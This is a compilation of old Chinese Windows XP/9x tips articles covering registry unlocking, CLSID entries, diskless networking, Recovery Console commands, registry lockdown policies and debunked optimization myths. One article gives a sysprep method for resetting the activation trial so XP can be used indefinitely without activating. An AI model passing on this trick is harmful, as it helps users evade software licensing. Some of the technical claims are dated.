    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System下的DWORD值“DisableRegistryTools”被修改为“1”的缘故，将其键值恢复为“0”即可恢复注册表的使用。

    解决办法:

    可以自己动手制作一个解除注册表锁定的工具，就是用记事本编辑一个任意名字的.reg文件，比如recover.reg，内容如下：
    REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

     要特别注意的是：如果你用这个方法制作解除注册表锁定的工具，一定要严格按照上面的书写格式进行，不能遗漏更不能修改（其实你只需将上述内容“复制”、“粘贴”到你机器记事本中即可）；完成上述工作后，点击记事本的文件菜单中的“另存为”项，文件名可以随意，但文件扩展名必须为.reg（切记）,然后点击“保存”。这样一个注册表解锁工具就制作完成了，之后你只须双击生成的工具图标，其会提示你是否将这个信息添加进注册表，你要点击“是”，随后系统提示信息已成功输入注册表，再点击“确定”即可将注册表解锁了


微软提供的超级大餐

《一键清理系统垃圾》

微软提供的超级大餐

02-03-11　　作者：

要正常使用WindowsXP当然要激活了，虽说如此，但是微软竟提供了一份超级大餐来犒劳我们，使用这个大餐，我们可以无限制的使用WinXP而无需激活。

打开任意的一张完整版的WindowsXP的光盘，找到support\tools下的一个叫做deploy.cab的压缩包，解压缩到任意一个目录里面，运行里面的sysprep.exe，然后什么度别要设置，直接确定即可！程序会把计算机关闭，重新开机以后你会发现你又有30天的试用期了。

特殊用法：当你的WindowsXP由于时间已到/硬件更改次数超出限制而无法在正常模式下登录时，你可以启动到安全模式下登陆，然后在里面运行这个程序，一样有效！

此方法已经经过我多次试验，很有效的！

注意事项：运行sysprep.exe之前必须注意的地方：
1.备份你留在桌面上的所有东西，因为一旦使用了这个工具，它会自动删除桌面上的所有东西；
2.如果你需要系统日志的话也要自己备份；
3.使用以后可能有部分软件需要重新安装


电脑内不可改名的方法

《一键清理系统垃圾》

电脑内不可改名的方法

修改例如：控制面板，一类的名称不可以直接修改，可以从注册表修改
在注册表下的
[HKEY_CLASSES_ROOT\CLSID]
目录下有这些文件，下面是一些参数，由于我的电脑是XP优化界面，需要文件支持
请安装系统图标文件。
REGEDIT4

[HKEY_CLASSES_ROOT\CLSID]
@=""

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}]
@="控制面板"
"InfoTip"="使用“控制面板”个性化您的计算机。例如，您可以指定桌面的显示(“显示”图标)、事件的声音(“声音”图标)、音频音量的大小(“多媒体”图标)和其它内容。"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,-137"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\InProcServer32]
@="shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{21EC2020-3AEA-1069-A2DD-08002B30309D}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"=hex(2):66,69,6c,65,3a,2f,2f,43,3a,5c,57,49,4e,44,4f,57,53,5c,\
  77,65,62,5c,63,6f,6e,74,72,6f,6c,70,2e,68,74,74,00

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}]
@="打印机"
"InfoTip"="使用打印机文件夹添加并安装本地或网络打印机，或更改现有打印机的设置。"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\shell32.dll,-138"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\InProcServer32]
@="shell32.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{2227A280-3AEA-1069-A2DE-08002B30309D}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"=hex(2):66,69,6c,65,3a,2f,2f,43,3a,5c,57,49,4e,44,4f,57,53,5c,\
  77,65,62,5c,70,72,69,6e,74,65,72,73,2e,68,74,74,00

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}]
@="计划任务"
"InfoTip"="这是调度程序的计划任务工具，它能让电脑按照预定的时间任务
有规律地运行一些程序"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\\\Win2000.icl,25"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\InProcServer32]
@="C:\\WINDOWS\\SYSTEM\\mstask.dll"
"ThreadingModel"="Both"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\ShellFolder]
"Attributes"=hex:00,00,00,21

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex]
@=""

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"="file://C:\\WINDOWS\\web\\schedule.htt"

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\PropertySheetHandlers]
@=""

[HKEY_CLASSES_ROOT\CLSID\{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\shellex\PropertySheetHandlers\{1F2E5C40-9550-11CE-99D2-00AA006E086C}]
@=""

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}]
@="拨号网络"
"InfoTip"="使用“拨号网络”访问其它计算机上的共享信息，即使您的计算机不在该网络中。必须将要拨入的计算机设置为网络服务器，才能使用它的共享资源。"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\InProcServer32]
@="rnaui.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\DefaultIcon]
@="C:\\WINDOWS\\SYSTEM\\rnaui.dll,0"

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\ShellFolder]
"Attributes"=hex:04,00,00,20

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex]

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex\ExtShellFolderViews]

[HKEY_CLASSES_ROOT\CLSID\{992CFFA0-F557-101A-88EC-00DD010CCC48}\shellex\ExtShellFolderViews\{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
"PersistMoniker"="file://C:\\WINDOWS\\web\\dialup.htt"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}]
@="Web 文件夹"
"InfoTip"="您可以创建快捷方式，使它们指向您公司 Intranet 或万维网上的 Web 文件夹。要将文档发布到 Web 文件夹中或要管理文件夹中的文件，请单击该文件夹的快捷方式。"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\InProcServer32]
@="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\Web 文件夹\\MSONSEXT.DLL"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\DefaultIcon]
@="C:\\PROGRA~1\\COMMON~1\\MICROS~1\\Web 文件夹\\MSONSEXT.DLL,0"

[HKEY_CLASSES_ROOT\CLSID\{BDEADF00-C265-11d0-BCED-00A0C90AB50F}\ShellFolder]
"Attributes"=dword:a8400000


无盘/终端教案

《一键清理系统垃圾》

无盘/终端教案

一、无盘/终端基本概念

无盘网络概念

无盘网络主要是指工作站其运行的操作系统,应用软件等文件都存储在服务器磁盘上的一种计算机网络构型.工作站上不具备磁盘驱动器(包括软盘,硬盘.光盘)仅是表面现象,不具有实质意思.

终端网络概念

终端网络主要特点是终端机上运行终端仿真程序,该程序接受用户的输入指令,并通过专用的通讯把用户需进行的各种操作指令传递给服务器,由服务器"代替"工作站完成这些处理,最后把处理结果返回终端工作站.

二、无盘网络发展史

1、无盘DOS网络。早期的无盘网络多数属于Novell公司的Netware无盘网络。在1996年Windows NT 4.0 Server发布前，Netware是局域网络的工为标准，其无盘工作站也曾横行一时。无盘网络Netware3.x作为服务器操作系统。无盘工作站以IPX协议登录，主要应用于DOS环境下的各种处理，有为证明，我国很多证券营业部仍然采用Netware无盘网络作为股票交易网络。

2、无盘WIN95网络。1996年Windows NT 4.0 Server发布后，Netware在局域网市场的份额开始受到强烈挤压，随着Windows NT 4.0 Server在局域网市场竞争中逐步取得优势地位，Windows NT 4.0 Server支持的RPL无盘网络开始推广，由于Windows NT 4.0 Server与Windwos 9x产品结合的性能优于Netware，并且在无盘网络领域也是如此，因此除一些无盘DOS工作站仍然采用Neteare无盘形式外，无盘windows95网络基本上都采用Windows NT 4.0 Server作为服务器操作系统。

3、“假WIN98”无盘网络。然而，微软公司并没有看好无盘网络，微软从1997年推出的Windows95 OEM2（国内俗称1997）开始，不再提供无盘启动支持，微软己经将其重点转向了WINDOWS终端。很多无盘爱好者在此情况下将原来的无盘WIN95改头换面和添加了IE浏览器等功能后，推出了所谓的“假WIN98”无盘网络，无盘Windows网络前一时黯淡。

4、无盘WIN98网络，但自2000年以来，世界从多著名IT公司重新将目光投向了无盘网络，开发也大量的无盘软件：例如

a、Intel公司开发了PXE无盘启动方式

b、Qualstem公司开发了可以安装无盘win98的Litenet工具软件

c、3Com公司不仅开发了能够支持服务器多网卡PXE启动的无盘软件DABS，还开发了能够在无盘工作站端实现虚拟硬盘的VLD软件等。

5、借助以上公司的实力，现在的无盘网络也实行了性能的跨越，现在的无盘网络不仅早己能够运行WIN98，甚至能够运行WIN2000，不仅能够无盘启动操作系统，而且几乎能够运行所有可以在有盘系统上运行的软件。

三、无盘/终端网络的系统结构

计算机网络的系统结构是指网络服务器与工作站之间协同工作时的相互关系。

局域网络的发展过程中，存在着四种不同的系统结构：

1、主机系统：也叫主机/终端系统，指以一台服务器为中心的多用户系统，用户通过与主机相边的字符终端在主机操作系统的管理下共享主机的同存、外存、中央处理器、输入、输出设备等资源。

传统的主机/终端系统均采用字符界面，不便于用户进行操作。Windows终端不是传统意义上的终端，而是基于WIDOWS图形界面，同时具有原来传统终端的多用户、多任务处理能力的瘦客户机/服务器模式。即WINDOWS终端通过相关的协议使客户端连接到服务器，所有软件的运行、配置、数据存储及与其他设置之间的通信全部在服务器上运行。终端机只是把本地键盘、鼠标等输入信息发送给终端服务器，并在终端显示器上显示处理结果。

2、工作站/文件服务器系统：其结构通常是在文件服务器上运行着特定的网络操作系统，工作站输入有效的用户名和口令扣，就可以存取文件服务器上的文件。文件服务不参与工作站应用程序的运算处理。无盘网络就属于该种系统结构。

3、客户机/服务器系统：是在工作站/服务器结构的基础上发展起来的，即需要处理的工作是由客户端和服务器共同完成的。

4、对等网络系统：与其他计算机结构的区别是没有专用服务器。每一个工作站即是客户机也是服务器。

四、无盘/终端网络常用通信协议

通信协议是指网络中通信各方事先约定的通信规则，从应用的功能角度来分，可以分为两大类：

1、局域网通信协议，如TCP/IP、IPX/SPS、NetBUI等

2、实现某一特殊通信功能而开发的协议，如进行无程访问时的SLIP、PPP和RAS协议，实现无盘工作瓿的DLC协议，实现WINDOWS终端的ICA和RDP协议等。

DLC（Data Link Control)协议

DLC（Data Link Control)协议是微软在windows NT Server4.0和widnos 2000 Server中为无盘工作站专门开发的协议，该协议NetBEUI协议一起完成对无盘工作站的无程引导控制，并在无盘工作站与服务器之间对立连接后协助其他协议（如TCP/IP、IPX/SPX等）进行工作。

RDP（Remote Display Protocol)协议

RDP（Remote Display Protocol)协议是基于ITU的一国际性标准协议，它最早应用于微软件通信软件，微软在1998年6月推出的WTSE（Windows NT 4.0 Terminal Server Editon)终端服务器操作系统中RDP开始被作为终端协议来使用，并在WINDOWS 2000 Server 和WINDOWS XP中得到了发展。目前RDP专门用作微软公司的WINODWS终端协议。

ICA（Independent Computing Archtectuer)独立计算构件协议

ICA（Independent Computing Archtectuer)独立计算构件协议是Citrix 公司为其Windows终端服务软件WinFrame开发的一个终端控制协议，并逐步成为Citrix后续开发的各种终端仿真软件的基础性协议。

五、无盘/终端网络的启动过程

1、无盘工作站加电，主板BIOS程序完成自检，然后即开始执行网卡启动芯片中的启动程序，使网卡在程序控制下向网络发出启动请求。

2、无盘网络服务器收到由网络传来的启动请求后，检查该无盘工站在网络服务器上的启动授权情况，如果允许该工作站启动则返回一个回应，表示服务器可以传送给无盘工作站启动文件。

3、无盘工作站收到服务器发来的因应后，与服务器建立网络连接并开始接收启运文件，然后系统控制权由BOOT ROM转到内存中的特定区域，开始引导操作系统。

六、无盘启动方式

1、Netware无盘网络的启运方式

Netware无盘网络可以采用网卡厂家专门为Netware设计的启动芯片程序，也可以使用于windows NT 的RPL启动芯片程序，但需要在Netware服务器上加载RPL组件

2、Windows NT RPL 启动方式

RPL是Remote Initial Program Load (远程初始化程序引导）的缩写，最早由WINDOWS NT Server开始使用，在WINODW NT SERVER中启动时需使用DLC和NETBEUI协议。最初RPL启动方式只能用于WINDOWS NT SEVRVER 服务器，WINDOWS 2000系统列操作系统在设计时并不支持RPL启动方式，但国内的无盘爱好者己经制用出移植工具，将WINDOWS NT SERVER的RPL启动方式移植到了WINDOWS2000甚至WINDOWS XP上，使RPL启动方式延续了生命。另外，RPL启动方式也得到了NETWAER网络的支持。]

3、Intel PXE启动方式

PXE是Preboot Execution Environment(预启动执行环境）的缩写，是Intel 公司开发的新一代无盘启动方式

4、其他TCP/IP启动方式

a、BOotpd启动方式

b、华教纯TCP/IP启动方式

C、启明星TPC/IP启动方式

七、终端网络的启动方式


Windows XP 控制台命令详解 - 系统和磁盘操作命令

《一键清理系统垃圾》

Windows XP 控制台命令详解 - 系统和磁盘操作命令

2002-02-22　　　　 作者：

编者语：
    Windows XP（包括 Windows 2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

    Bootcfg

    bootcfg 命令启动配置和故障恢复（对于大多数计算机，即 boot.ini 文件）。

    含有下列参数的 bootcfg 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 bootcfg 命令。

    用法：

    bootcfg /default　　设置默认引导项。

    bootcfg /add　　　　向引导列表中添加 Windows 安装。

    bootcfg /rebuild　　重复全部 Windows 安装过程并允许用户选择要添加的内容。

    注意：使用 bootcfg /rebuild 之前，应先通过 bootcfg /copy 命令备份 boot.ini 文件。

    bootcfg /scan　　　 扫描用于 Windows 安装的所有磁盘并显示结果。

    注意：这些结果被静态存储，并用于本次会话。如果在本次会话期间磁盘配置发生变化，为获得更新的扫描，必须先重新启动计算机，然后再次扫描磁盘。

    bootcfg /list　　　列出引导列表中已有的条目。

    bootcfg /disableredirect 在启动引导程序中禁用重定向。

    bootcfg /redirect [ PortBaudRrate] |[ useBiosSettings]

    在启动引导程序中通过指定配置启用重定向。

    范例：

bootcfg /redirect com1 115200
bootcfg /redirect useBiosSettings

    hkdsk

    创建并显示磁盘的状态报告。Chkdsk 命令还可列出并纠正磁盘上的错误。

    含有下列参数的 chkdsk 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 chkdsk 命令。

    vol [drive:] [ chkdsk [drive:] [/p] [/r]

    参数　　无

    如果不带任何参数，chkdsk 将显示当前驱动器中的磁盘状态。

drive: 指定要 chkdsk 检查的驱动器。
/p　　 即使驱动器不在 chkdsk 的检查范围内，也执行彻底检查。该参数不对驱动器做任何更改。
/r　　 找到坏扇区并恢复可读取的信息。隐含着 /p 参数。

    注意

Chkdsk 命令需要 Autochk.exe 文件。如果不能在启动目录（默认为 \%systemroot%\System32）中找到该文件，将试着在 Windows 安装 CD 中找到它。如果有多引导系统的计算机，必须保证是在包含 Windows 的驱动器上使用该命令。
    Diskpart

    创建和删除硬盘驱动器上的分区。diskpart 命令仅在使用故障恢复控制台时才可用。

    diskpart [ /add |/delete] [device_name |drive_name |partition_name] [size]

    参数 无

    如果不带任何参数，diskpart 命令将启动 diskpart 的 Windows 字符模式版本。

    /add

    创建新的分区。

    /delete

    删除现有分区。

    device_name

    要创建或删除分区的设备。设备名称可从 map 命令的输出获得。例如，设备名称：

    \Device\HardDisk0

    drive_name

    以驱动器号表示的待删除分区。仅与 /delete 同时使用。以下是驱动器名称的范例：

    D:

    partition_name

    以分区名称表示的待删除分区。可代替 drive_name 使用。仅与 /delete 同时使用。以下是分区名称的范例：

    \Device\HardDisk0\Partition1

     大小

    要创建的分区大小，以兆字节 (MB)表示。仅与 /add 同时使用。

    范例

    下例将删除分区：

diskpart /delete \ Device\ HardDisk0\ Partition3
diskpart /delete F:

    下例将在硬盘上添加一个 20 MB 的分区：

    diskpart /add \ Device\ HardDisk0 20

    Fixboot

    向系统分区写入新的分区引导扇区。只有在使用故障恢复控制台时，才能使用 fixboot 命令。

    fixboot [drive]

    参数　　驱动器

    将要写入引导扇区的驱动器。它将替代默认的驱动器（即用户登录的系统分区）。例如，驱动器：D:

    范例

    下列命令范例向驱动器 D: 的系统分区写入新的分区引导扇区：

    fixboot d:

    注意: 如果不带任何参数，fixboot 命令将向用户登录的系统分区写入新的分区引导扇区。

    Fixmbr

    修复启动磁盘的 主启动记录。fixmbr 命令仅在使用故障恢复控制台时才可用。

    fixmbr [ device_name]

    参数

    device_name

    要写入新的主引导记录的设备（驱动器）。设备名称可从 map 命令的输出获得。例如，设备名称：

    \Device\HardDisk0

    范例

    下列命令示例向指定设备写入一个新的主引导记录：

    fixmbr \Device\HardDisk0

    注意

如果不指定 device_name，新的主引导记录将被写入引导设备，即装载主系统的驱动器。
如果系统检测到无效或非标准分区表标记，将提示用户是否继续执行该命令。除非您访问驱动器有问题，否则不要继续进行。向系统分区写入新的主引导记录可能破坏分区表并导致分区无法访问。
    Format

    将指定的驱动器格式化为指定的文件系统。含有下列参数的 format 命令仅在使用故障恢复控制台时才可用。可在命令提示符下使用带有不同参数的 format 命令。

    format [ drive:] [ /fs:file-system]

    参数

    drive:

    指定要格式化的驱动器。不能从故障恢复控制台格式化软盘。

    /q

    对驱动器进行快速格式化。不扫描驱动器看是否有坏区域，因此只应对以前格式化过的驱动器使用该参数。

    /fs:file-system

    指定要使用的文件系统：FAT、FAT32 或 NTFS 。如果未指定文件系统，将使用现有的文件系统格式。

    Map

    显示驱动器号与物理设备名称的映射。该信息在运行 fixboot 和 fixmbr 命令时非常有用。

    map 命令仅在使用故障恢复控制台时才可用。

    Map [ arc]

    参数

    arc

    指示 map 命令显示高级 RISC 计算 (ARC)设备名称而不是设备名称。以下是 ARC 设备名称的范例：

    multi(0)disk(0)rdisk(0)partition(1)

    等价的设备名称是：

    \Device\HardDisk0\Partition1

    范例

    下例将物理设备名映射为使用 ARC 设备名称的驱动器号：

    map arc

    注意

如果不使用 arc 参数，则 map 命令显示设备名称。
map 命令还显示文件系统的类型和每个磁盘的大小（MB）。
← 返回


限制Win9X/NT系统功能二十六招

《一键清理系统垃圾》

限制Win9X/NT系统功能二十六招

    对于一些公用或专用的计算机，我们并不希望每个人都能修改系统的设定或运行其它的程序。尽管他们有时会认为自己的水平不低，但他们经常性的“偶然失手”会使你不停地忙于对系统进行维护。在这种情况下，我们就不得不想点招对系统的功能进行限制。

    注册表实际是一系列数据文件，Windows 9x/NT主要通过它对硬件、软件、用户环境以及Windows的特性进行控制。在Windows 3.1时代，主要由Win.ini、System.ini及各个.ini文件完成注册表的功能。当你遇到一些入门教材不能解决的问题时，通过修改注册表却往往能使你如愿以偿。

    要修改注册表就必须用到注册表编辑器。在Windows 9x中，注册表编辑器是Regedit.exe，它位于Windows目录下。在Windows NT中，专为Windows NT设计的注册表编辑器是Regedt32.EXE，它位于\WinNT\System32目录中。在Windows NT 4.0中，系统也提供了Regedit.exe，它位于\WinNT目录下。这里特别说明的是，对于本文涉及到的注册表的修改，Windows NT这两种注册表编辑器都可以用。

    启动注册表编辑器最简单的方法是在开始菜单的“运行”命令行中键入Regedit或Regedt32（对于Windows NT操作系统）。

    1、从“开始”菜单中删除“运行”命令（Windows 9x & NT）,只能部分限制运行应用程序，应用程序仍然可以从资源管理器中运行。
    键名 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
    值名 NoRun
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    2、从“开始”菜单中删除“注销……”命令（Windows 9x & NT）,在Windows NT上，“注销”按钮将不起作用。
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion \Policies\Explorer]
    值名 NoClose
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    3、禁用“关闭系统”命令（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\CurrentVersion\Policies\Explorer]
    值名 NoLogOff
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    4、从“开始”/“设置”菜单中删除除“任务栏”以外的其它菜单项（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoSetFolders
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    5、从“开始”/“设置”菜单中删除“任务栏和开始菜单”命令（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoSetTaskbar
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    6、隐藏“网上邻居” （Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoNetHood
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    7、NoEntireNetWork, 隐藏“网上邻居”中“整个网络” （Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software \Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoEntireNetwork
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    8、隐藏“桌面”上所有图标（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoDesktop
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    9、退出时不保存设定（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software \Microsoft\Windows\Current Version\Policies\Explorer]
    值名 NoSaveSettings
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    10、只运行允许的Windows应用程序（Windows 9x & NT），这大概是最有价值的一招，这可以防止在你负责的公用机器上有人运行你不想运行的程序。如果再结合上面几招，那么这台公用机器就刀枪不入了。但使用该项功能时前，一定要谨慎，一旦有个程序没有列出，就无法运行它，所以Regedit.exe应首先列进去。这样即使注册表编辑器被禁用，采用导入注册表文件的方法，也可将注册表编辑器功能恢复。
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\Explorer]
    值名 RestrictRun
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    11、此外在该路径下需新建主键RestrictRun，在该键下添加值名为“1”、“2”、“3”等字符串值，其数据为允许运行的程序名。不需要输入路径，只要指定执行程序的文件名。如下所示，
    键名 [HKEY_CURRENT_USER\Software\Microsoft\Windows\Current Version\Policies\Explorer\RestrictRun]
    值名 1
    类型 REG_SZ (字串值)
    数据 允许运行的Windows应用程序名

    12、禁止对显示器图标的访问（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\System]
    值名 NoDispCPL
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    13、隐藏“显示属性”对话框上“背景”选项卡（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\System]
    值名 NoDispBackgroundPage
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）

    14、隐藏“显示属性”对话框上“屏幕保护程序”选项卡（Windows 9x & NT）
    键名 [HKEY_CURRENT_USER\Software\ Microsoft\Windows\Current Version\Policies\System]
    值名 NoDispScrSavPage
    类型 REG_DWORD (双字值)
    数据 （0=无效；1=有效）


谣言惑众-几个著名的伪优化

《一键清理系统垃圾》

谣言惑众-几个著名的伪优化

因为需要，谣言就产生了。但可能是太需要了，有些谣言越传越真，越传越广。网络发达了，什么样的信息都有，直接翻译的、自己编译 修改的、自己发明创造的…… 最近，在网上，甚至在一些媒体中已经让不少谣言使一些电脑初学者陷于深深的误区中，甚至步入了迷途……现在，电脑使用中的“谣言 ”一般都来源于一些优化系统、免费增强系统性能等技巧。但用多了以后就发现，有些技巧看似有用，但用起来又感觉不出什么效果，有 些甚至导致你的系统“死亡”。

谣言之一：妙用Ｇｈｏｓｔ，硬盘容量就翻倍

诱惑指数：９ 危险指数：８

你只需要准备两块硬盘和一款Ｇｈｏｓｔ ２００３软件，就可以把硬盘容量成倍地扩充。甚至在一些网站上还给出了在Ｗｉｎｄｏｗｓ下的磁盘增加容量截图和上述方法的详细流 程（具体操作不在这里描述）。这篇来自国外网站的翻译文章，引起不少网友的猜测和兴趣。把硬盘免费增容这是谁都愿意做的事情，８ ０ＧＢ的硬盘突然变成１２０ＧＢ或者更多，谁都想吃这份免费的午餐。但最终的试验结果让不少网友纷纷遭殃。

就这个问题，我们特意咨询了赛门铁克（Ｓｙｍａｎｔｅｃ）相关技术人员。他们看了上述方法后，表示因这种做法而产生的一个新分区 肯定是不可用的，如果向该分区写数据还可能会损坏其他正常分区。出现这种现象的原因主要在于，不少硬盘分区表文件是没有经过微软 技术认证的，这就导致Ｇｈｏｓｔ可能会因为某种操作，在Ｗｉｎｄｏｗｓ操作系统中对硬盘分区发生误认，而产生对硬盘分区表的误识 别问题。这样的问题，最有可能发生在两块不同品牌硬盘之间的镜像备份与恢复操作上，但这是一种比较偶然的现象。

谣言之二：有ＳＶＣＨＯＳＴ．ＥＸＥ就删，因为那是病毒

诱惑指数：５ 危险指数：７

冲击波，一种在去年８月份出现的病毒，一度给计算机用户造成了极度的恐慌。进入２００４年，冲击波少了很多，但是冲击波“惊魂” 却没有减少。据不少报道称，很多人一看见系统有ＳＶＣＨＯＳＴ．ＥＸＥ进程，就说自己感染了冲击波，甚至很多人开始认为，ＳＶＣ ＨＯＳＴ．ＥＸＥ就是木马程序的伪装外壳。

但ＳＶＣＨＯＳＴ．ＥＸＥ本身却是Ｗｉｎｄｏｗｓ操作系统中一个正常的进程。它是基于ＮＴ内核的Ｗｉｎｄｏｗｓ操作系统中用于管 理系统服务的一个程序。在Ｗｉｎｄｏｗｓ ２０００中，一般有两个该进程；Ｗｉｎｄｏｗｓ ＸＰ中肯定会有四个该进程。Ｓｅｒｖｅｒ级别的操作系统里面，ＳＶＣＨＯＳＴ．ＥＸＥ进程数目更多。通常，ＳＶＣＨＯＳＴ．ＥＸ Ｅ文件存在于％ｓｙｓｔｅｍｒｏｏｔ％＼ｓｙｓｔｅｍ３２目录下和ｄｌｌｃａｃｈｅ目录下面。其他目录出现ＳＶＣＨＯＳＴ．ＥＸ Ｅ就可能不正常了。

所以，面对这个进程大可不必谈虎色变。在正确的目录下也别去强行删除这个文件。大家如果要鉴别是不是系统提供的ＳＶＣＨＯＳＴ． ＥＸＥ的方法也很简单，只需要查看ＳＶＣＨＯＳＴ．ＥＸＥ的原始路径即可（具体方法参照本期Ｅ８版文章）。

谣言之三：去掉ＱｏＳ的２０％，网速快起来

诱惑指数：８ 危险指数：４

安装完Ｗｉｎｄｏｗｓ ＸＰ Ｐｒｏｆｅｓｓｉｏｎａｌ以后，运行ｇｐｅｄｉｔ．ｍｓｃ，打开Ｗｉｎｄｏｗｓ ＸＰ的组策略，然后找到“计算机配置→管理模板→网络→ＱｏＳ数据包调度程序”一项，修改为０％，这样就可以解除Ｗｉｎｄｏｗｓ ＸＰ保留的２０％的网络带宽。这个“技巧”可能是Ｗｉｎｄｏｗｓ ＸＰ面世以来，传播得最为广泛的谣言。

但问题真的如上所述那样，Ｗｉｎｄｏｗｓ ＸＰ一直保留了２０％的带宽了吗？答案是否定的，被保留的带宽是用于一种在Ｗｉｎｄｏｗｓ ２０００里面引入的新技术——ＱｏＳ（即：联网服务质量），而且，不是说这２０％的带宽就一定会被占用，事实上，只有在使用了Ｑ ｏＳ 应用程序编程接口 ＡＰＩ 编写应用程序需要访问网络的时候，才会利用到这２０％的带宽。如果这些使用了ＱｏＳ ＡＰＩ的应用程序没有访问网络时，所保留的带宽仍然能够被其他应用程序所采用。

